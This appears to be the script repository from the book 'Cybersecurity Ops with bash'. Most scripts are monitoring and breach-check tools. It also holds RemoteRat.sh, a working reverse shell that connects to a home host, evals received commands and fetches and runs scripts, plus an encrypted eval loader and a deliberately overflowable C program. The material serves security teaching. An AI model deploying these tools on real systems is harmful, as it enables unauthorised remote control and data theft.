encrypted='U2FsdGVkX18WvDOyPFcvyvAozJHS3tjrZIPlZM9xRhz0tuwzDrKhKBBuugLxzp7T
MoJoqx02tX7KLhATS0Vqgze1C+kzFxtKyDAh9Nm2N0HXfSNuo9YfYD+15DoXEGPd' #<1>
# <2> -s: the password is not echoed while it is typed
read -s word #<2>
# <3> The password is handed to openssl on its command line (pass:...), so it
# is present in the process arguments while openssl runs. The exit status of
# openssl is not checked; whatever text it prints ends up in innerScript.
innerScript=$(echo "$encrypted" | openssl aes-256-cbc -base64 -d -pass pass:"$word") #<3>
# <4> eval runs the decrypted text inside this shell. To review what would
# run, decrypt the payload separately and read it instead of executing it.
eval "$innerScript" #<4>
================================================
FILE: ch15/fuzzer.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# fuzzer.sh
#
# Description:
# Fuzz a specified argument of a program
#
# Usage:
# bash fuzzer.sh <executable> <arg1> [?] <arg3> ...
# <executable> The target executable program/script
# <argn> The static arguments for the executable
# '?' The argument to be fuzzed
# example: fuzzer.sh ./myprog -t '?' fn1 fn2
#
#
# usagexit - print the usage text and an example, then exit with status 1.
# The redirection after the closing brace sends all of it to stderr.
function usagexit ()                            # <1>
{
    printf '%s\n' "usage: $0 executable args" \
                  "example: $0 myapp -lpt arg \?"
    exit 1
} >&2                                           # <2>
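if (($# < 2))                                   # <3>
then
    usagexit
fi
# the app we will fuzz is the first arg
THEAPP="$1"
shift                                           # <4>
# is it really there?
type -t "$THEAPP" >/dev/null || usagexit        # <5>
# which arg to vary?
# find the ? and note its position
declare -i i
declare -a ALIST=()
NDX=''      # start empty so a value inherited from the environment is ignored
for ((i=0; $# ; i++))                           # <6>
do
    ALIST+=( "$1" )                             # <7>
    if [[ $1 == '?' ]]
    then
        NDX=$i                                  # <8>
    fi
    shift
done
# without a '?' placeholder there is no argument to vary, and the array
# assignment in the loop below would have no valid index
[[ -n $NDX ]] || usagexit
# printf "Executable: %s Arg: %d %s\n" "$THEAPP" $NDX "${ALIST[$NDX]}"
# now fuzz away:
MAX=10000
FUZONE="a"
FUZARG=""
for ((i=1; i <= MAX; i++))                      # <9>
do
    FUZARG="${FUZARG}${FUZONE}"                 # aka +=
    ALIST[$NDX]="$FUZARG"
    # order of >s is important: stderr is pointed at our stdout first, then
    # stdout alone is discarded
    # quoted so the program path is run as one word, matching the type -t check
    "$THEAPP" "${ALIST[@]}" 2>&1 >/dev/null     # <10>
    if (( $? )) ; then echo "Caused by: $FUZARG" >&2 ; fi   # <11>
done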
================================================
FILE: ch15/fuzzme.c
================================================
#include <stdio.h>
#include <string.h>
//Cybersecurity Ops with bash
//Warning - This is an insecure program and is for demonstration
//purposes only
/*
 * Joins argv[1], a single space and argv[2] in a fixed 50-byte buffer and
 * prints the result. Deliberately left unsafe (see the warning above);
 * presumably the test target for ch15/fuzzer.sh.
 *
 * Known weaknesses, all visible below:
 *  - argc is never checked, so argv[1] or argv[2] may be NULL when fewer
 *    than two arguments are given.
 *  - strcat() does no bounds checking: once the two arguments together
 *    exceed 48 characters (50 minus the space and the terminating NUL) the
 *    copy runs past the end of combined[].
 */
int main(int argc, char *argv[])
{
char combined[50] = "";     /* destination buffer, size fixed at 50 */
strcat(combined, argv[1]);  /* unbounded copy of the first argument */
strcat(combined, " ");
strcat(combined, argv[2]);  /* unbounded copy of the second argument */
printf("The two arguments combined is: %s\n", combined);
return(0);
}
================================================
FILE: ch16/LocalRat.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# LocalRat.sh
#
# Description:
# Remote access tool to be on a local system,
# it listens for a connection from the remote system
# and helps with any file transfer requested
#
# Usage: LocalRat.sh port1 [port2 [port3]]
#
#
# define our background file transfer daemon
# bgfilexfer - background loop that answers file requests:
#   1. listen on HOMEPORT2 and read a file name from the connection
#   2. the name 'exit' ends this background process
#   3. otherwise listen on HOMEPORT3 and send that file to whoever connects
# Globals read: HOMEPORT2, HOMEPORT3; written: FN
function bgfilexfer ()
{
while true
do
# nc's verbose output and errors are appended to the fixed path /tmp/x2.err
FN=$(nc -nlvvp $HOMEPORT2 2>>/tmp/x2.err) # <3>
if [[ $FN == 'exit' ]] ; then exit ; fi
# NOTE(review): FN arrives from the network and is used unchecked and
# unquoted, so the peer on HOMEPORT2 decides which readable local file is
# sent, and neither listener authenticates the connecting side
nc -nlp $HOMEPORT3 < $FN # <4>
done
}
# -------------------- main ---------------------
# the first port comes from $1; the second and third default to the next
# consecutive port numbers when not given
HOMEPORT=$1
HOMEPORT2=${2:-$((HOMEPORT+1))}
HOMEPORT3=${3:-$((HOMEPORT2+1))}
# initiate the background file transfer daemon
bgfilexfer & # <1>
# listen for an incoming connection
# this foreground nc connects the terminal to whichever peer connects to HOMEPORT
nc -nlvp $HOMEPORT # <2>
================================================
FILE: ch16/RemoteRat.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# RemoteRat.sh
#
# Description:
# Remote access tool to be run on the remote system;
# mostly hands any input to the shell
# but if indicated (with a !) fetch and run a script
#
# Usage: RemoteRat.sh hostname port1 [port2 [port3]]
#
# cleanup - EXIT handler: remove the staged script file named by TMPFL.
# Globals read: TMPFL
function cleanup ()
{
rm -f $TMPFL
}
# runScript - request a named script from the home host and run it.
# Arguments: $1 - name to request ('exit' ends this process after the
#                 request has been sent)
# Globals read: HOMEHOST, HOMEPORT2, HOMEPORT3, TMPFL
# Observable on the host: the fetched content is written to TMPFL and then
# executed by a new bash process; nothing verifies what was received.
function runScript ()
{
# tell 'em what script we want
echo "$1" > /dev/tcp/${HOMEHOST}/${HOMEPORT2} # <7>
# stall
sleep 1 # <8>
if [[ $1 == 'exit' ]] ; then exit ; fi
cat > $TMPFL </dev/tcp/${HOMEHOST}/${HOMEPORT3} # <9>
bash $TMPFL # <10>
}
# ------------------- MAIN -------------------
# could do some error checking here
HOMEHOST=$1
HOMEPORT=$2
# the second and third ports default to the next consecutive numbers
HOMEPORT2=${3:-$((HOMEPORT+1))}
HOMEPORT3=${4:-$((HOMEPORT2+1))}
# fetched scripts are staged at a fixed, PID-derived path under /tmp
TMPFL="/tmp/$$.sh"
trap cleanup EXIT
# phone home:
# from here on stdin, stdout and stderr of this shell are all the same
# outbound TCP connection; a bash process whose three standard descriptors
# are one socket is the visible trace of this step
exec </dev/tcp/${HOMEHOST}/${HOMEPORT} 1>&0 2>&0 # <1>
while true
do
echo -n '$ ' # <2>
read -r # <3>
if [[ ${REPLY:0:1} == '!' ]] # <4>
then
# it's a script
FN=${REPLY:1} # <5>
runScript $FN
else
# normal case - run the cmd
# every other line received is evaluated by this shell without filtering
eval "$REPLY" # <6>
fi
done
================================================
FILE: ch19/pingmonitor.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# pingmonitor.sh
#
# Description:
# Use ping to monitor host availability
#
# Usage:
# pingmonitor.sh <file> <seconds>
# <file> File containing a list of hosts
# <seconds> Number of seconds between pings
#
# Endless monitoring loop: ping every host listed in the file "$1", log the
# ones that do not answer, then count down "$2" seconds before the next pass.
while true
do
    clear
    printf '%s\n' 'Cybersecurity Ops System Monitor' \
                  'Status: Scanning ...' \
                  '-----------------------------------------'
    while read -r ipadd
    do
        ipadd=$(echo "$ipadd" | sed 's/\r//')           #<1> strip a carriage return
        # NOTE(review): "-n 1" looks like the Windows form of "send one
        # packet"; other ping implementations use a different option for the
        # count -- confirm against the platform this runs on
        #<2> #<3> the host counts as down when ping's output matches
        if ping -n 1 "$ipadd" | egrep '(Destination host unreachable|100%)' &> /dev/null
        then
            tput setaf 1                                #<4>
            echo "Host $ipadd not found - $(date)" | tee -a monitorlog.txt  #<5>
            tput setaf 7
        fi
    done < "$1"
    echo ""
    echo "Done."
    i="$2"                                              #<6>
    while (( i > 0 ))
    do
        tput cup 1 0                                    #<7>
        echo "Status: Next scan in $i seconds"
        sleep 1
        (( i-- ))
    done
done
================================================
FILE: ch20/softinv.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# softinv.sh
#
# Description:
# list the software installed on a system
# for later aggregation and analysis;
#
# Usage: ./softinv.sh [filename]
# output is written to $1 or <hostname>_softinv.txt
#
# set the output filename
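# set the output filename
OUTFN="${1:-${HOSTNAME}_softinv.txt}"           # <1>
# which command to run depends on the OS and what's there;
# the probes run in order and a later match replaces an earlier one,
# so the result is apt, else dpkg, else rpm, else the Windows default
OSbase=win
if type -t rpm &> /dev/null                     # <2> <3>
then
    OSbase=rpm
fi
if type -t dpkg &> /dev/null
then
    OSbase=deb
fi
if type -t apt &> /dev/null
then
    OSbase=apt
fi
# the command is kept as an array so that each word stays one argument
case ${OSbase} in                               # <4>
    win)
        INVCMD=(wmic product get name,version //format:csv)
        ;;
    rpm)
        INVCMD=(rpm -qa)
        ;;
    deb)
        INVCMD=(dpkg -l)
        ;;
    apt)
        INVCMD=(apt list --installed)
        ;;
    *)
        echo "error: OSbase=${OSbase}"
        exit 255        # same status the shell reports for "exit -1"
        ;;
esac
#
# run the inventory
#
# <5> the file name is quoted so a name containing blanks is still one target
"${INVCMD[@]}" 2>/dev/null > "$OUTFN"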
================================================
FILE: ch21/test.input
================================================
file ./TODO.txt
!file ./validate.sh
!file nogo.sh
user albing
!user bob
group mysql
!group skip
hash a7f36f4519661cf2aaaf0ebf057f768fc35dafe8 validate.sh
hash b79f70b18538de0199e6829e06b547e079df8842 /bin/ls
================================================
FILE: ch21/validateconfig.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# validateconfig.sh
#
# Description:
# Validate a specified configuration exists
#
# Usage:
# validateconfig.sh < configfile
#
# configuration specification looks like:
# [[!]file|hash|reg|[!]user|[!]group] [args]
# examples:
# file /usr/local/bin/sfx - file exists
# hash 12384970347 /usr/local/bin/sfx - file has this hash
# !user bono - no user "bono" allowed
# group students - must have a students group
#
# errexit - show correct usage and exit
# errexit - report the offending input line, show the accepted syntax,
# then exit with status 2.
# Globals read: ln (current input line number)
function errexit ()
{
    printf '%s\n' "invalid syntax at line $ln" \
                  "usage: [!]file|hash|reg|[!]user|[!]group [args]"   # <1>
    exit 2
} # errexit
# vfile - validate the [non]existence of filename
# args: 1: the "not" flag - value:1/0
# 2: filename
#
# vfile - check whether a file exists.
# Arguments: $1 - the "not" flag (1 inverts the result, 0 leaves it)
#            $2 - file name
# Returns:   1 when the file exists and 0 when it does not; the two values
#            are swapped when the "not" flag is set
function vfile ()
{
    local -i isThere
    if [[ -e $2 ]]                              # <2>
    then
        isThere=1
    else
        isThere=0
    fi
    if (( $1 ))                                 # <3>
    then
        isThere=$(( 1 - isThere ))
    fi
    return $isThere
} # vfile
# verify the user id
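# vuser - check whether a user account exists.
# Arguments: $1 - the "not" flag (1 inverts the result, 0 leaves it)
#            $2 - user name
# Globals:   UCMD (read) - lookup command, possibly several words ("net user")
# Returns:   0 when the user exists, 1 when not; swapped when the "not"
#            flag is set
function vuser ()
{
    local -i isUser=0
    # UCMD is split into words on purpose. The name is quoted so an empty
    # name is looked up as such instead of vanishing from the command line.
    # Any failure status is folded to 1: with a lookup tool that reports a
    # larger status, 1 minus that status would be negative and a negated
    # check could never pass.
    $UCMD "$2" &>/dev/null || isUser=1
    if (( $1 ))                                 # <4>
    then
        isUser=$(( 1 - isUser ))
    fi
    return $isUser
} # vuser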
# verify the group id
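# vgroup - check whether a group exists.
# Arguments: $1 - the "not" flag (1 inverts the result, 0 leaves it)
#            $2 - group name
# Returns:   0 when the group exists, 1 when not; swapped when the "not"
#            flag is set
function vgroup ()
{
    local -i isGroup=0
    # Look the name up as a group. "id <name>" resolves user names, so a
    # group that has no user of the same name would be reported as missing.
    if [[ -z $2 ]]
    then
        isGroup=1
    elif type -t getent &>/dev/null
    then
        getent group "$2" &>/dev/null || isGroup=1
    elif [[ -r /etc/group ]]
    then
        awk -F: -v g="$2" '$1 == g { found = 1 } END { exit !found }' /etc/group \
            || isGroup=1
    else
        # nothing better available: keep the earlier lookup
        id "$2" &>/dev/null || isGroup=1
    fi
    if (( $1 ))
    then
        isGroup=$(( 1 - isGroup ))
    fi
    return $isGroup
} # vgroup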
# verify the hash on the file
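# vhash - compare a file's SHA-1 digest with an expected value.
# Arguments: $1 - expected digest (hex text)
#            $2 - file name
# Returns:   1 when the digests are equal, 0 otherwise (including when the
#            file cannot be read)
# NOTE(review): SHA-1 is kept because existing configuration lines carry
# SHA-1 values; it is no longer collision-resistant, so consider moving the
# configuration to a stronger digest.
function vhash ()
{
    local res=0
    local X
    # quoted file name and -- so names with blanks or a leading dash work
    X=$(sha1sum -- "$2" 2>/dev/null)            # <5>
    # The right-hand side is quoted so it is compared literally. Unquoted it
    # is a pattern, and an expected value of * would match every file.
    if [[ -n $X && ${X%% *} == "$1" ]]          # <6>
    then
        res=1
    fi
    return $res
} # vhash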
# a windows system registry check
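# vreg - a Windows registry check: compare a registry value with an expected
# string.
# Arguments: $1 - key path, $2 - value name, $3 - expected text
# Returns:   1 when the command output equals the expected text, 0 otherwise
# NOTE(review): "query" is called as a stand-alone command here; this looks
# like it is meant to be the registry query tool -- confirm the command name
# and that its full output (not just the data column) equals the expected text.
function vreg ()
{
    local res=0
    local keypath=$1
    local value=$2
    local expected=$3
    local REGVAL
    REGVAL=$(query "$keypath" //v "$value")
    # quoted so the expected text is compared literally, not as a pattern
    if [[ $REGVAL == "$expected" ]]
    then
        res=1
    fi
    return $res
} # vreg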
#
# main
#
# do this once, for use in verifying user ids
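# do this once, for use in verifying user ids
UCMD="net user"
type -t net &>/dev/null || UCMD="id"            # <7>
ln=0
# one check per input line: first word is the check name, the rest its arguments
while read -r cmd args
do
    ln=$(( ln + 1 ))
    donot=0
    # the check name is the first word with an optional leading '!' removed;
    # it must be set for every line, not only for negated ones
    basecmd=$cmd
    if [[ ${cmd:0:1} == '!' ]]                  # <8>
    then
        donot=1
        basecmd=${cmd#\!}                       # <9>
    fi
    # OK is the status the check function returns when the line is satisfied
    case "$basecmd" in
    file)
        OK=1
        vfile $donot "$args"
        res=$?
        ;;
    hash)
        OK=1
        # split args into 1st word , remainder
        vhash "${args%% *}" "${args#* }"        # <10>
        res=$?
        ;;
    reg)
        # Windows Only!
        OK=1
        vreg $args
        res=$?
        ;;
    user)
        OK=0
        # the "not" flag is the first argument the function expects
        vuser $donot $args
        res=$?
        ;;
    group)
        OK=0
        vgroup $donot $args
        res=$?
        ;;
    *)  errexit                                 # <11>
        ;;
    esac
    if (( res != OK ))
    then
        echo "FAIL: [$ln] $cmd $args"
    fi
done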
================================================
FILE: ch22/checkemail.1liner
================================================
#!/bin/bash
#
# checkemail.sh - check an email address against
# the Have I Been Pwned? database
# in 1 line
# Take the address from the first argument, or ask for it when none is given.
if (( "$#" == 0 ))                              #<1>
then
    printf 'Enter email address: '
    read EMAILIN
else
    EMAILIN="$1"
fi
# the same variable is reused to hold the full request URL
EMAILIN="https://haveibeenpwned.com/api/v2/breachedaccount/$EMAILIN"
echo 'Account pwned in the following breaches:'
# <2> one pipeline: fetch, keep the "Name":"..." pairs, keep the value, drop the quotes
curl -s "$EMAILIN" \
    | grep -Po '"Name":".*?"' \
    | cut -d':' -f2 \
    | tr -d '\"'
================================================
FILE: ch22/checkemail.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# checkemail.sh
#
# Description:
# check an email address against the
# Have I Been Pwned? database
#
# Usage: ./checkemail.sh [<email>]
# <email> Email address to check; default: reads from stdin
#
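# Exit status: 0 when the address is listed in at least one breach,
#              1 when nothing was returned for it.
if (( "$#" == 0 ))                              #<1>
then
    printf 'Enter email address: '
    read -r emailin         # -r: take the typed text as is
else
    emailin="$1"
fi
# <2> -f makes curl return no body on an HTTP error. Without it the text of
# an error page counts as a hit, and callers that test the exit status
# (emailbatch.sh) would report the address as breached.
# NOTE(review): this is the v2 endpoint; later versions of the service's API
# are understood to require an API key -- confirm the endpoint still answers.
pwned=$(curl -sf "https://haveibeenpwned.com/api/v2/breachedaccount/$emailin")
if [ "$pwned" == "" ]
then
    exit 1
else
    echo 'Account pwned in the following breaches:'
    echo "$pwned" | grep -Po '"Name":".*?"' | cut -d':' -f2 | tr -d '\"'   #<3>
    exit 0
fi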
================================================
FILE: ch22/checkemailAlt.sh
================================================
#!/bin/bash
#
# checkemail.sh - check an email address against
# the Have I Been Pwned? database
#
# Address from the first argument, or prompt for it when none is given.
case $# in                                      #<1>
    0)
        printf 'Enter email address: '
        read emailin
        ;;
    *)
        emailin="$1"
        ;;
esac
URL="https://haveibeenpwned.com/api/v2/breachedaccount/$emailin"
# <2> keep only the "Name":"..." pairs of the reply; a reply without any
# leaves pwned empty
pwned=$(curl -s "$URL" | grep -Po '"Name":".*?"' )
if [[ -z $pwned ]]
then
    exit 1
fi
echo 'Account pwned in the following breaches:' # <3>
pwned="${pwned//\"/}"           # remove all quotes
pwned="${pwned//Name:/}"        # remove all 'Name:'
echo "${pwned}"
exit 0
================================================
FILE: ch22/checkpass.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# checkpass.sh
#
# Description:
# Check a password against the
# Have I Been Pwned? database
#
# Usage: ./checkpass.sh [<password>]
# <password> Password to check
# default: read from stdin
#
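# Exit status: 0 - the password's hash is listed by the service
#              1 - it is not listed
#              2 - the service could not be queried (no verdict)
if (( "$#" == 0 ))                              #<1>
then
    printf 'Enter your password: '
    # <2> -s: no echo. IFS= and -r keep leading/trailing blanks and
    # backslashes, so the hash is taken over exactly what was typed.
    IFS= read -rs passin
    echo
else
    # a password given as an argument is visible in the process list;
    # the prompt above avoids that
    passin="$1"
fi
# <3> printf writes the password byte for byte, whatever it starts with
passin=$(printf '%s' "$passin" | sha1sum)
passin=${passin:0:40}
# <4> only the first five hex digits of the hash are sent to the service;
# the rest is compared locally against the list that comes back
firstFive=${passin:0:5}
ending=${passin:5}
# a failed request must not be reported as "not listed"
if ! response=$(curl -sf "https://api.pwnedpasswords.com/range/$firstFive")
then
    echo 'error: could not query the password service' >&2
    exit 2
fi
pwned=$(printf '%s\n' "$response" | tr -d '\r' | grep -i "$ending")   #<5>
passwordFound=${pwned##*:}                      #<6>
if [ "$passwordFound" == "" ]
then
    exit 1
else
    printf 'Password is Pwned %d Times!\n' "$passwordFound"
    exit 0
fi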
================================================
FILE: ch22/emailbatch.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# emailbatch.sh
#
# Description:
# Read in a file of email addresses and run them
# against Have I Been Pwned
#
# Usage: ./emailbatch.sh [<filename>]
# <filename> File with one email address on each line
# default: reads from stdin
#
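# <1> Read the addresses from the named file, or from stdin when no file is
# given, as the usage text states. Carriage returns are removed; the ||
# test also handles a last line that has no trailing newline.
tr -d '\r' < "${1:-/dev/stdin}" | while read -r fileLine || [[ -n $fileLine ]]
do
    # an empty line is not an address; do not send a request for it
    [[ -n $fileLine ]] || continue
    #<2> #<3> checkemail.sh exits 0 when the address is listed
    if ./checkemail.sh "$fileLine" > /dev/null
    then
        echo "$fileLine is Pwned!"
    fi
    sleep 0.25                                  #<4> pause between requests
done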
================================================
FILE: readme.txt
================================================
Cybersecurity Ops with bash
Attack, Defend, and Analyze from the Command Line
----------------------------------------------------------------------------------------
Scripts Version 1.0
----------------------------------------------------------------------------------------
About
----------------------------------------------------------------------------------------
All of the scripts and data referenced in the book are included with this file. The
number tags (e.g., <1>, <2>, <3>) contained in each script file correspond to the
numbered callout explanations in the book.
Script Robustness
----------------------------------------------------------------------------------------
The included scripts are written to illustrate and teach concepts. The
scripts are not designed to be efficient or robust enough for enterprise deployment.
Use caution if you choose to use the scripts in a live environment. Be sure to follow
programming best practices and test your scripts before deployment.
Disclaimer
----------------------------------------------------------------------------------------
The included scripts are provided "as is" and without any warranties or guarantees.
----------------------------------------------------------------------------------------
https://www.rapidcyberops.com
----------------------------------------------------------------------------------------
gitextract_c6os0si7/ ├── LICENSE ├── ch03/ │ ├── echoparams.sh │ └── osdetect.sh ├── ch04/ │ └── frost.txt ├── ch05/ │ ├── cmds.txt │ ├── cutfile.txt │ ├── getlocal.sh │ ├── hashsearch.sh │ ├── typesearch.sh │ └── winlogs.sh ├── ch06/ │ ├── accesstime.txt │ ├── awkusers.txt │ ├── book.json │ ├── book.xml │ ├── csvex.txt │ ├── ips.txt │ ├── passwords.txt │ ├── procowner.txt │ ├── tasks.txt │ ├── user.txt │ └── usernames.txt ├── ch07/ │ ├── access.log │ ├── countem.awk │ ├── countem.sh │ ├── histogram.sh │ ├── histogram_plain.sh │ ├── pagereq.awk │ ├── pagereq.sh │ ├── summer.sh │ ├── useragents.sh │ └── useragents.txt ├── ch08/ │ ├── livebar.sh │ ├── looper.sh │ ├── tailcount.sh │ └── wintail.sh ├── ch09/ │ ├── autoscan.sh │ ├── fd2.sh │ └── scan.sh ├── ch10/ │ └── baseline.sh ├── ch11/ │ ├── Calc_VT.txt │ ├── WannaCry_VT.txt │ ├── helloworld.c │ ├── vtjson.awk │ └── vtjson.sh ├── ch12/ │ ├── tagit.sh │ ├── webdash.sh │ └── weblogfmt.sh ├── ch13/ │ ├── bannergrabber.sh │ └── smtpconnect.sh ├── ch14/ │ ├── askey.sh │ ├── innerscript.sh │ ├── logfuscate.sh │ ├── oneline.sh │ ├── readable.sh │ ├── streamcipher.sh │ ├── synfuscate.sh │ └── wrapper.sh ├── ch15/ │ ├── fuzzer.sh │ └── fuzzme.c ├── ch16/ │ ├── LocalRat.sh │ └── RemoteRat.sh ├── ch19/ │ └── pingmonitor.sh ├── ch20/ │ └── softinv.sh ├── ch21/ │ ├── test.input │ └── validateconfig.sh ├── ch22/ │ ├── checkemail.1liner │ ├── checkemail.sh │ ├── checkemailAlt.sh │ ├── checkpass.sh │ └── emailbatch.sh └── readme.txt
SYMBOL INDEX (2 symbols across 2 files) FILE: ch11/helloworld.c function main (line 3) | int main() FILE: ch15/fuzzme.c function main (line 8) | int main(int argc, char *argv[])
Condensed preview — 71 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (137K chars).
[
{
"path": "LICENSE",
"chars": 1084,
"preview": "MIT License\n\nCopyright (c) 2019 Cybersecurity Ops with bash\n\nPermission is hereby granted, free of charge, to any person"
},
{
"path": "ch03/echoparams.sh",
"chars": 225,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# echoparams.sh\n#\n# Description: \n# Demonstrates accessing parameters in b"
},
{
"path": "ch03/osdetect.sh",
"chars": 363,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# osdetect.sh\n#\n# Description: \n# Distinguish between MS-Windows/Linux/Mac"
},
{
"path": "ch04/frost.txt",
"chars": 257,
"preview": "1 Two roads diverged in a yellow wood,\n2 And sorry I could not travel both\n3 And be one traveler, long I stood\n"
},
{
"path": "ch05/cmds.txt",
"chars": 625,
"preview": "#Linux Command |MSWin Bash |XML tag |Purpose\n#----------------+------------+-----------+--------------------------"
},
{
"path": "ch05/cutfile.txt",
"chars": 72,
"preview": "12/05/2017 192.168.10.14 test.html\n12/30/2017 192.168.10.185 login.html\n"
},
{
"path": "ch05/getlocal.sh",
"chars": 1583,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# getlocal.sh\n#\n# Description: \n# Gathers general system information and d"
},
{
"path": "ch05/hashsearch.sh",
"chars": 736,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# hashsearch.sh\n#\n# Description: \n# Recursively search a given directory f"
},
{
"path": "ch05/typesearch.sh",
"chars": 1636,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# typesearch.sh\n#\n# Description: \n# Search the file system for a given fil"
},
{
"path": "ch05/winlogs.sh",
"chars": 816,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# winlogs.sh\n#\n# Description: \n# Gather copies of Windows log files\n#\n# Us"
},
{
"path": "ch06/accesstime.txt",
"chars": 51,
"preview": "0745,file1.txt,1\n0830,file4.txt,2\n0830,file5.txt,3\n"
},
{
"path": "ch06/awkusers.txt",
"chars": 57,
"preview": "Mike Jones\nJohn Smith\nKathy Jones\nJane Kennedy\nTim Scott\n"
},
{
"path": "ch06/book.json",
"chars": 228,
"preview": "{ <1>\n \"title\": \"Cybersecurity Ops with bash\", <2>\n \"edition\": 1,\n \"authors\": [ <3>\n {\n \"firstName\": \"Paul\",\n"
},
{
"path": "ch06/book.xml",
"chars": 255,
"preview": "<book title=\"Cybersecurity Ops with bash\" edition=\"1\"> <1>\n <author> <2>\n <firstName>Paul</firstName> <3>\n <lastN"
},
{
"path": "ch06/csvex.txt",
"chars": 252,
"preview": "\"name\",\"username\",\"phone\",\"password hash\"\n\"John Smith\",\"jsmith\",\"555-555-1212\",5f4dcc3b5aa765d61d8327deb882cf99\n\"Jane Sm"
},
{
"path": "ch06/ips.txt",
"chars": 79,
"preview": "ip,OS\n10.0.4.2,Windows 8\n10.0.4.35,Ubuntu 16\n10.0.4.107,macOS\n10.0.4.145,macOS\n"
},
{
"path": "ch06/passwords.txt",
"chars": 425,
"preview": "password,md5hash\n123456,e10adc3949ba59abbe56e057f20f883e\npassword,5f4dcc3b5aa765d61d8327deb882cf99\nwelcome,40be4e59b9a2a"
},
{
"path": "ch06/procowner.txt",
"chars": 56,
"preview": "Process Owner;PID\njdoe;0\ntjones;4\njsmith;340\nmsmith;528\n"
},
{
"path": "ch06/tasks.txt",
"chars": 178,
"preview": "\nImage Name;PID;Session Name;Session#;Mem Usage\nSystem Idle Process;0;Services;0;4 K\nSystem;4;Services;0;2,140 K\nsmss.ex"
},
{
"path": "ch06/user.txt",
"chars": 75,
"preview": "user,ip\njdoe,10.0.4.2\njsmith,10.0.4.35\nmsmith,10.0.4.107\ntjones,10.0.4.145\n"
},
{
"path": "ch06/usernames.txt",
"chars": 24,
"preview": "1,jdoe\n2,puser\n3,jsmith\n"
},
{
"path": "ch07/access.log",
"chars": 65316,
"preview": "192.168.0.37 - - [12/Nov/2017:15:52:59 -0500] \"GET / HTTP/1.1\" 200 2377 \"-\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko"
},
{
"path": "ch07/countem.awk",
"chars": 251,
"preview": "# Cybersecurity Ops with bash\n# countem.awk\n#\n# Description: \n# Count the number of instances of an item using awk\n#\n# U"
},
{
"path": "ch07/countem.sh",
"chars": 540,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# countem.sh\n#\n# Description: \n# Count the number of instances of an item "
},
{
"path": "ch07/histogram.sh",
"chars": 921,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# histogram.sh\n#\n# Description: \n# Generate a horizontal bar chart of spec"
},
{
"path": "ch07/histogram_plain.sh",
"chars": 783,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# histogram_plain.sh\n#\n# Description: \n# Generate a horizontal bar chart o"
},
{
"path": "ch07/pagereq.awk",
"chars": 465,
"preview": "# Cybersecurity Ops with bash\n# pagereq.awk\n#\n# Description: \n# Count the number of page requests for a given IP address"
},
{
"path": "ch07/pagereq.sh",
"chars": 514,
"preview": "# Cybersecurity Ops with bash\n# pagereq.sh\n#\n# Description: \n# Count the number of page requests for a given IP address "
},
{
"path": "ch07/summer.sh",
"chars": 369,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# summer.sh\n#\n# Description: \n# Sum the total of field 2 values for each u"
},
{
"path": "ch07/useragents.sh",
"chars": 1007,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# useragents.sh\n#\n# Description: \n# Read through a log looking for unknown"
},
{
"path": "ch07/useragents.txt",
"chars": 27,
"preview": "Firefox\nChrome\nSafari\nEdge\n"
},
{
"path": "ch08/livebar.sh",
"chars": 767,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# livebar.sh\n#\n# Description: \n# Creates a rolling horizontal bar chart of"
},
{
"path": "ch08/looper.sh",
"chars": 507,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# looper.sh\n#\n# Description: \n# Count the lines in a file being tailed -f\n"
},
{
"path": "ch08/tailcount.sh",
"chars": 475,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# tailcount.sh\n#\n# Description: \n# Count lines every n seconds\n#\n# Usage: "
},
{
"path": "ch08/wintail.sh",
"chars": 472,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# wintail.sh\n#\n# Description: \n# Perform a tail-like function on a Windows"
},
{
"path": "ch09/autoscan.sh",
"chars": 793,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# autoscan.sh\n#\n# Description: \n# Automatically performs a port scan (usin"
},
{
"path": "ch09/fd2.sh",
"chars": 1597,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# fd2.sh\n#\n# Description: \n# Compares two port scans to find changes\n# MAJ"
},
{
"path": "ch09/scan.sh",
"chars": 998,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# scan.sh\n#\n# Description: \n# Perform a port scan of a specified host\n#\n# "
},
{
"path": "ch10/baseline.sh",
"chars": 2642,
"preview": "#!/bin/bash\n\n# baseline.sh - compare baselines\n# and report on differences\n#\n\nfunction usageErr ()\n{\n ec"
},
{
"path": "ch11/Calc_VT.txt",
"chars": 6873,
"preview": "{\"scans\": {\"Bkav\": {\"detected\": false, \"version\": \"1.3.0.9466\", \"result\": null, \"update\": \"20180712\"}, \"MicroWorld-eScan"
},
{
"path": "ch11/WannaCry_VT.txt",
"chars": 8205,
"preview": "{\"scans\": {\"Bkav\": {\"detected\": true, \"version\": \"1.3.0.9466\", \"result\": \"W32.WannaCrypLTE.Trojan\", \"update\": \"20180712\""
},
{
"path": "ch11/helloworld.c",
"chars": 75,
